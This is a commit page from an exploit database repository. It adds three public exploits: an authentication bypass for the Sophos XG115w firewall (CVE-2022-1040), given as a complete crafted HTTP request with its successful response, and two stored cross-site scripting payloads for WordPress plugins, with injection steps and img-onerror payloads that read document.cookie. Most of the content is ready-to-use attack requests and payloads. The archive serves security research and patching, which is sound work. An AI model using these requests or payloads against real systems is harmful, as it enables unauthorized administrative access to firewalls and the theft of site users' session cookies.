Skip to content
This repository was archived by the owner on Nov 28, 2022. It is now read-only.

Commit 2f709ff

Browse files
author
Offensive Security
committed
DB: 2022-09-02
3 changes to exploits/shellcodes Sophos XG115w Firewall 17.0.10 MR-10 - Authentication Bypass WordPress Plugin Testimonial Slider and Showcase 2.2.6 - Stored Cross-Site Scripting (XSS) WordPress Plugin Netroics Blog Posts Grid 1.0 - Stored Cross-Site Scripting (XSS)
1 parent a8cb58b commit 2f709ff

File tree

4 files changed

+85
-0
lines changed

4 files changed

+85
-0
lines changed
Lines changed: 50 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,50 @@
1+
# Exploit Title: Sophos XG115w Firewall 17.0.10 MR-10 - Authentication Bypass
2+
# Date: 2022-08-04
3+
# Exploit Author: Aryan Chehreghani
4+
# Vendor Homepage: https://www.sophos.com
5+
# Version: 17.0.10 MR-10
6+
# Tested on: Windows 11
7+
# CVE : CVE-2022-1040
8+
9+
# [ VULNERABILITY DETAILS ] :
10+
11+
#This vulnerability allows an attacker to gain unauthorized access to the firewall management space by bypassing authentication.
12+
13+
# [ SAMPLE REQUEST ] :
14+
15+
POST /webconsole/Controller HTTP/1.1
16+
Host: 127.0.0.1:4444
17+
Cookie: JSESSIONID=c893loesu9tnlvkq53hy1jiq103
18+
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0
19+
Accept: text/plain, */*; q=0.01
20+
Accept-Language: en-US,en;q=0.5
21+
Accept-Encoding: gzip, deflate
22+
X-Requested-With: XMLHttpRequest
23+
Origin: https://127.0.0.1:4444
24+
Referer: https://127.0.0.1:4444/webconsole/webpages/login.jsp
25+
Sec-Fetch-Dest: empty
26+
Sec-Fetch-Mode: cors
27+
Sec-Fetch-Site: same-origin
28+
Te: trailers
29+
Connection: close
30+
Content-Type: application/x-www-form-urlencoded
31+
Content-Length: 192
32+
33+
mode=151&json={"username"%3a"admin","password"%3a"somethingnotpassword","languageid"%3a"1","browser"%3a"Chrome_101","accessaction"%3a1,+"mode\u0000ef"%3a716}&__RequestType=ajax&t=1653896534066
34+
35+
# [ KEY MODE ] : \u0000eb ,\u0000fc , \u0000 ,\u0000ef ,...
36+
37+
# [ Successful response ] :
38+
39+
HTTP/1.1 200 OK
40+
Date: Thu, 04 Aug 2022 17:06:39 GMT
41+
Server: xxxx
42+
X-Frame-Options: SAMEORIGIN
43+
Strict-Transport-Security: max-age=31536000
44+
Expires: Thu, 01 Jan 1970 00:00:00 GMT
45+
Content-Type: text/plain;charset=utf-8
46+
Content-Length: 53
47+
Set-Cookie: JSESSIONID=1jy5ygk6w0mfu1mxbv6n30ptal108;Path=/webconsole;Secure;HttpOnly
48+
Connection: close
49+
50+
{"redirectionURL":"/webpages/index.jsp","status":200}

exploits/php/webapps/51007.txt

Lines changed: 15 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,15 @@
1+
# Exploit Title: WordPress Plugin Testimonial Slider and Showcase 2.2.6 - Stored Cross-Site Scripting (XSS)
2+
# Date: 05/08/2022
3+
# Exploit Author: saitamang , yunaranyancat , syad
4+
# Vendor Homepage: https://wordpress.org
5+
# Software Link: https://wordpress.org/plugins/testimonial-slider-and-showcase/
6+
# Version: 2.2.6
7+
# Tested on: Centos 7 apache2 + MySQL
8+
9+
WordPress Plugin "Testimonial Slider and Showcase" is prone to a cross-site scripting (XSS) vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. WordPress Plugin "Testimonial Slider and Showcase" version 2.2.6 is vulnerable; prior versions may also be affected.
10+
11+
Login as Editor > Add testimonial > Under Title inject payload below ; parameter (post_title parameter) > Save Draft > Preview the post
12+
13+
payload --> test"/><img/src=""/onerror=alert(document.cookie)>
14+
15+
The draft post can be viewed using the Editor account or Admin account and XSS will be triggered once clicked.

exploits/php/webapps/51008.txt

Lines changed: 17 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,17 @@
1+
# Exploit Title: WordPress Plugin Netroics Blog Posts Grid 1.0 - Stored Cross-Site Scripting (XSS)
2+
# Date: 08/08/2022
3+
# Exploit Author: saitamang, syad, yunaranyancat
4+
# Vendor Homepage: wordpress.org
5+
# Software Link: https://downloads.wordpress.org/plugin/netroics-blog-posts-grid.zip
6+
# Version: 1.0
7+
# Tested on: Centos 7 apache2 + MySQL
8+
9+
WordPress Plugin "Netroics Blog Posts Grid" is prone to a stored cross-site scripting (XSS) vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. WordPress Plugin "Netroics Blog Posts Grid" version 1.0 is vulnerable; prior versions may also be affected.
10+
11+
Login as Editor > Add testimonial > Under Title inject payload below ; parameter (post_title parameter) > Save Draft > Preview the post
12+
13+
14+
payload --> user s1"><img src=x onerror=alert(document.cookie)>.gif
15+
16+
17+
The draft post can be viewed using other Editor or Admin account and Stored XSS will be triggered.

files_exploits.csv

Lines changed: 3 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -45067,3 +45067,6 @@ id,file,description,date,author,type,platform,port
4506745067
51002,exploits/php/webapps/51002.txt,"Feehi CMS 2.1.1 - Stored Cross-Site Scripting (XSS)",1970-01-01,"Shivam Singh",webapps,php,
4506845068
51003,exploits/multiple/webapps/51003.txt,"ThingsBoard 3.3.1 'name' - Stored Cross-Site Scripting (XSS)",1970-01-01,"Steffen Langenfeld",webapps,multiple,
4506945069
51004,exploits/multiple/webapps/51004.txt,"ThingsBoard 3.3.1 'description' - Stored Cross-Site Scripting (XSS)",1970-01-01,"Steffen Langenfeld",webapps,multiple,
45070+
51006,exploits/hardware/webapps/51006.txt,"Sophos XG115w Firewall 17.0.10 MR-10 - Authentication Bypass",1970-01-01,"Aryan Chehreghani",webapps,hardware,
45071+
51007,exploits/php/webapps/51007.txt,"WordPress Plugin Testimonial Slider and Showcase 2.2.6 - Stored Cross-Site Scripting (XSS)",1970-01-01,"Luqman Hakim Zahari",webapps,php,
45072+
51008,exploits/php/webapps/51008.txt,"WordPress Plugin Netroics Blog Posts Grid 1.0 - Stored Cross-Site Scripting (XSS)",1970-01-01,"Luqman Hakim Zahari",webapps,php,

0 commit comments

Comments
 (0)